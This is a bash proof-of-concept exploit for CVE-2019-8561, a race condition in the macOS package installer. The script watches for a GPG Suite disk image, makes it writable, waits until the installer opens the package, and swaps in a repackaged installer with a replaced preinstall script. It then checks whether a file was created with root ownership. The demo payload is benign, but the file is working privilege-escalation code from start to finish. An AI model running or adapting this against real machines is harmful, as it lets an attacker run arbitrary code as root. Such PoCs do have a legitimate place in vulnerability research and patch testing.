#!/bin/bash
# CVE-2019-8561/gpg_poc

declare -r touch_path="/var/test"
declare -r expand_path="/tmp/Install"

echo "Waiting for GPG Suite DMG in ~/Downloads..."

while true; do
  
  if ls "/Users/${USER}/Downloads" | grep -q 'GPG_Suite'; then

    dmg_path=$(echo /Users/${USER}/Downloads/GPG_Suite-*)

    echo "Found ${dmg_path}"

    echo "Converting read-only DMG to RW..."
    hdiutil convert -ov "${dmg_path:?}" -format UDRW -o "${dmg_path:?}"> /dev/null
    # This should take 2-3 seconds
    break
  fi
  sleep 2
  # Sleep so we don't run ls 6 times a second
done

echo "Resizing DMG"
hdiutil resize -size 60m "${dmg_path}"
# Need to do this to avoid a TOCTOU issue when we delete the legit PKG
# There wont be enough space on the DMG to move the malicious PKG
# Untill the OS updates the size info of the DMG which takes ages...

echo "Waiting for PKG installer to start..."
( tail -f -n 0  /var/log/install.log & ) | grep -q 'Opened from:' 

echo "PKG Install Detected"
pkg_path=$(grep 'Opened from:' /var/log/install.log | tail -1 | cut -d ' ' -f7-)

echo "Expanding PKG"
pkgutil --expand "${pkg_path}" "${expand_path}"

echo "Replacing preinstall"
preinstall_file="${expand_path}/preinstall.pkg/Scripts/preinstall"

cat <<EOF > "${preinstall_file}"
#!/bin/bash

touch /var/test
chmod +x /var/test
EOF

echo "Flattening malicious PKG..."
pkgutil --flatten  "${expand_path}" "${expand_path}.pkg"
chown ${USER}:staff "${expand_path}.pkg"
# The new PKG gets created with $USER:wheel ownership which causes an error
# When moving it to another volume 

echo "Removing ${pkg_path}"
rm -f "${pkg_path:?}"

echo "Replacing Install.pkg with malicious PKG"
mv "${expand_path}.pkg" "${pkg_path}"

echo "Removing Expanded PKG"
rm -rf "${expand_path:?}"

echo "Wait for it..."
( tail -f -n0  /var/log/install.log & ) | grep -q 'End install' 

test_owner=$(ls -l "${touch_path}" | awk '{print $3}')

if [[ -f "${touch_path}" && "${test_owner}" == "root" ]]; then
  echo "Exploit successful!"
  exit 0
else
  echo "Exploit unsuccessful"
  exit 1
fi